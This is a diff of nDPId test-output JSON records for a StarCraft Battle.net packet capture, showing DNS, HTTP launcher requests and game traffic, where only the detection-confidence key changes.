-00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":299,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389981134,"flow_last_seen":1437389981169,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1437389981169,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":53145,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"nydus.battle.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"80.239.186.26"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":299,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389981134,"flow_last_seen":1437389981169,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1437389981169,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":53145,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"nydus.battle.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"80.239.186.26"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389981197,"flow_last_seen":1437389981197,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389981197,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3515,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1437389981197,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389981197,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EYNAAIAGHCvAqAFkUO+6Gg27AFBEOrW2AAAAAIACIAB5\/gAAAgQFtAEDAwgBAQQC"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1437389981256,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389981256,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDbuOe0nfRDq1t2ASOQixoAAAAgQFtAAA"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1437389981256,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389981256,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEYRAAIAGHDbAqAFkUO+6Gg27AFBEOrW3jntJ4FAQ+vAHdQAA"} -00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389981197,"flow_last_seen":1437389981265,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389981265,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3515,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/regions?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389981197,"flow_last_seen":1437389981265,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389981265,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3515,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/regions?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389981330,"flow_last_seen":1437389981330,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389981330,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1437389981330,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389981330,"pkt":"hCYVPnXEIImEa8W6CABFAAA0RD1AAIAG6XXAqAFkUO+6FQ28AFBBQIDMAAAAAIACIACx5gAAAgQFtAEDAwgBAQQC"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1437389981385,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389981385,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGertQ77oVwKgBZABQDbzhin+3QUCAzWASOQhgoQAAAgQFtAAA"} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1437389981385,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389981385,"pkt":"hCYVPnXEIImEa8W6CABFAAAoRD9AAIAG6X\/AqAFkUO+6FQ28AFBBQIDN4Yp\/uFAQ+vC2dQAA"} -00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":311,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389981330,"flow_last_seen":1437389981385,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1437389981385,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3516,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/regionsxml\/regions.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":311,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389981330,"flow_last_seen":1437389981385,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1437389981385,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3516,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/regionsxml\/regions.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":323,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982130,"flow_last_seen":1437389982130,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389982130,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.130","src_port":3517,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1437389982130,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389982130,"pkt":"hCYVPnXEIImEa8W6CABFAAA0Zr9AAIAGfH3AqAFk1fh\/gg29BF8F03V0AAAAAIACgABKLQAAAgQFtAEDAwABAQQC"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982140,"flow_last_seen":1437389982140,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389982140,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -155,13 +155,13 @@ 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1437389982183,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389982183,"pkt":"hCYVPnXEIImEa8W6CABFAAAoZsBAAIAGfIjAqAFk1fh\/gg29BF8F03V122fARVAQgADvOgAA"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1437389982197,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389982197,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDb7iEHr2BauURGASOQiM8wAAAgQFtAAA"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1437389982197,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389982197,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEZBAAIAGHCrAqAFkUO+6Gg2+AFAFq5RE4hB691AQ+vDixwAA"} -00827{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982140,"flow_last_seen":1437389982207,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389982207,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3518,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/alert?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00827{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982140,"flow_last_seen":1437389982207,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389982207,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3518,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/alert?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":332,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982269,"flow_last_seen":1437389982269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389982269,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3519,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1437389982269,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389982269,"pkt":"hCYVPnXEIImEa8W6CABFAAA0RElAAIAG6WnAqAFkUO+6FQ2\/AFB8c4vnAAAAAIACIABrlQAAAgQFtAEDAwgBAQQC"} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982130,"flow_last_seen":1437389982277,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1437389982277,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.130","src_port":3517,"dst_port":1119,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Starcraft","breed":"Fun","category":"Game"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982130,"flow_last_seen":1437389982277,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1437389982277,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.130","src_port":3517,"dst_port":1119,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Starcraft","breed":"Fun","category":"Game"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1437389982326,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389982326,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGertQ77oVwKgBZABQDb8Q\/FwJfHOL6GASOQgOjQAAAgQFtAAA"} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1437389982327,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389982327,"pkt":"hCYVPnXEIImEa8W6CABFAAAoREtAAIAG6XPAqAFkUO+6FQ2\/AFB8c4voEPxcClAQ+vBkYQAA"} -00814{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982269,"flow_last_seen":1437389982327,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1437389982327,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3519,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/alert\/en-gb","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00814{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982269,"flow_last_seen":1437389982327,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1437389982327,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3519,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/alert\/en-gb","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":377,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982769,"flow_last_seen":1437389982769,"flow_idle_time":200000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1437389982769,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"5.42.180.154","src_port":53146,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1437389982769,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":44,"pkt_l4_len":10,"thread_ts_msec":1437389982769,"pkt":"hCYVPnXEIImEa8W6CABFAAAeGS0AAIARpdHAqAFkBSq0ms+aBF8ACqcOCQE="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":378,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982769,"flow_last_seen":1437389982769,"flow_idle_time":200000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1437389982769,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"62.115.246.51","src_port":53146,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -178,38 +178,38 @@ 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1437389983663,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389983663,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EZpAAIAGHBTAqAFkUO+6Gg3BAFD6MpY\/AAAAAIACIADjdgAAAgQFtAEDAwgBAQQC"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1437389983723,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389983723,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDcFck85k+jKWQGASOQjIewAAAgQFtAAA"} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1437389983723,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389983723,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEZtAAIAGHB\/AqAFkUO+6Gg3BAFD6MpZAXJPOZVAQ+vAeUAAA"} -00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389983663,"flow_last_seen":1437389983723,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389983723,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3521,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/regions?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389983663,"flow_last_seen":1437389983723,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389983723,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3521,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/regions?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":517,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389983788,"flow_last_seen":1437389983788,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389983788,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1437389983788,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389983788,"pkt":"hCYVPnXEIImEa8W6CABFAAA0RFRAAIAG6V7AqAFkUO+6FQ3CAFAtDsyVAAAAAIACIAB6SQAAAgQFtAEDAwgBAQQC"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1437389983846,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389983846,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGertQ77oVwKgBZABQDcLXOt3ELQ7MlmASOQjVRgAAAgQFtAAA"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1437389983846,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389983846,"pkt":"hCYVPnXEIImEa8W6CABFAAAoRFZAAIAG6WjAqAFkUO+6FQ3CAFAtDsyW1zrdxVAQ+vArGwAA"} -00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":530,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389983788,"flow_last_seen":1437389983846,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1437389983846,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3522,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/regionsxml\/regions.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":530,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389983788,"flow_last_seen":1437389983846,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1437389983846,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3522,"dst_port":80,"l4_proto":"tcp","ndpi": 